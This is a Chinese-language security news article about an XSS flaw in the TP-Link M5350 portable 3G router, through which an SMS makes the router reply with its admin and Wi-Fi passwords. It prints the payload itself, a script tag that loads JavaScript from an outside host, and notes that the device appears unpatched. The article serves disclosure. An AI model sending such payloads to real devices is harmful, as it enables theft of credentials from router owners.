导语:这个漏洞比较有意思,向TP-Link路由器发送短信,它便会将管理员密码、Wi-Fi密码以短信形式回复。

TP-Link的设备漏洞库又增新丁。

这次的主角是TP-Link M5350,一款便携式3G路由器。

Bleeping Computer报道,德国安全研究员Jan Hörsch发现,该款路由器存在一枚神奇漏洞,向路由器发送短信,它便会将管理员密码、Wi-Fi密码以短信形式回复。

这是条什么短信呢?

<script src=//n.ms/a.js></script>
(不用试,研究员早把脚本下线了)

a6b6487242295a24414ef783c844b07c_edited_131610802_9bb33d33e9-056af23a0780ec50.png

漏洞效果图

懂行的读者应该已经知道是怎么回事了。没错,这就是XSS(跨站脚本攻击)漏洞。

作为3G路由器,TP-Link M5350支持短信收发功能,但在短信功能位置未做好过滤,以至于产生漏洞。

类似漏洞在互联网产品上比较常见,但能造成此等效果也很罕见,目测是TP-Link内部安全流程没能留意到。

听着厉害,不过想利用漏洞得先搞清楚使用者的3G上网卡号码,难度也不小。

比较奇葩的是,TP-Link目前应该还没修复漏洞。SecurityAffairs专门找了M5350的官方产品页(澳洲版),发现这款路由最新的固件发布日期是2015年1月,显然不是修复版。嘶吼也检索了一番,了解到M5350主要在海外卖,京东淘宝都没有,国内想研究的童鞋显然没啥机会了。

源链接

Hacking more

...